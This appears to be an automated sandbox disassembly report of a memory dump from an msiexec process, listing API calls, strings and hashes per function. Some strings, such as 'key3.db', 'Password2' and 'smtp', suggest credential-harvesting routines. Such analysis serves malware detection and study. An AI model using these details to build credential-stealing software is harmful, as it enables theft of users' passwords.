                                                                                              Similarity
                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                              • String ID:
                                                                                              • API String ID: 4247780290-0
                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                              • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                              • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                              • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                              • String ID:
                                                                                              • API String ID: 2374668499-0
                                                                                              • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                              • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                              • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                              • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040AD5B
                                                                                              • memset.MSVCRT ref: 0040AD71
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                              • sprintf.MSVCRT ref: 0040ADA8
                                                                                              Strings
                                                                                              • <%s>, xrefs: 0040ADA2
                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                              • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                              • API String ID: 3699762281-1998499579
                                                                                              • Opcode ID: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                              • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                              • Opcode Fuzzy Hash: 795a8691700f312257f705e85a86cce67b218055e3179b2cedf5ba95f87480a6
                                                                                              • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                              APIs
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@
                                                                                              • String ID:
                                                                                              • API String ID: 613200358-0
                                                                                              • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                              • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                              • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                              • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                              APIs
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                              • free.MSVCRT ref: 00409B00
                                                                                                • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$free
                                                                                              • String ID:
                                                                                              • API String ID: 2241099983-0
                                                                                              • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                              • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                              • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                              • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                              APIs
                                                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                              • String ID:
                                                                                              • API String ID: 2775283111-0
                                                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                              • API String ID: 885266447-2471937615
                                                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                              APIs
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                              • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$??2@??3@CloseHandleReadSize
                                                                                              • String ID: Ul@$key3.db
                                                                                              • API String ID: 3013762397-1563549157
                                                                                              • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                              • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                              • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                              • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                              APIs
                                                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                              • String ID: smtp
                                                                                              • API String ID: 2625860049-60245459
                                                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FocusMessagePostmemset
                                                                                              • String ID: S_@$l
                                                                                              • API String ID: 3436799508-4018740455
                                                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004092C0
                                                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                              • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                              Strings
                                                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscpymemset
                                                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                              • API String ID: 408644273-3424043681
                                                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy
                                                                                              • String ID: C^@$X$ini
                                                                                              • API String ID: 714388716-917056472
                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                              APIs
                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 3492281209-168460110
                                                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_strcmpimemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 275601554-2167791130
                                                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_mbscat
                                                                                              • String ID: 3CD
                                                                                              • API String ID: 3951308622-1938365332
                                                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$_mbscpy
                                                                                              • String ID: Password2
                                                                                              • API String ID: 2600922555-1856559283
                                                                                              • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                              • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                              • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                              • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                              • API String ID: 2574300362-543337301
                                                                                              • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                              • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                              • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                              • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: rows deleted
                                                                                              • API String ID: 2221118986-571615504
                                                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 3384217055-0
                                                                                              • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                              • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                              • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                              • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                              APIs
                                                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                              • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004048C2
                                                                                              • memset.MSVCRT ref: 004048D6
                                                                                              • memset.MSVCRT ref: 004048EA
                                                                                              • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                              • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                              • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D2C2
                                                                                              • memset.MSVCRT ref: 0040D2D8
                                                                                              • memset.MSVCRT ref: 0040D2EA
                                                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                              • memset.MSVCRT ref: 0040D319
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 368790112-0
                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                              APIs
                                                                                              • __allrem.LIBCMT ref: 00425850
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                              • __allrem.LIBCMT ref: 00425933
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2362905115.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
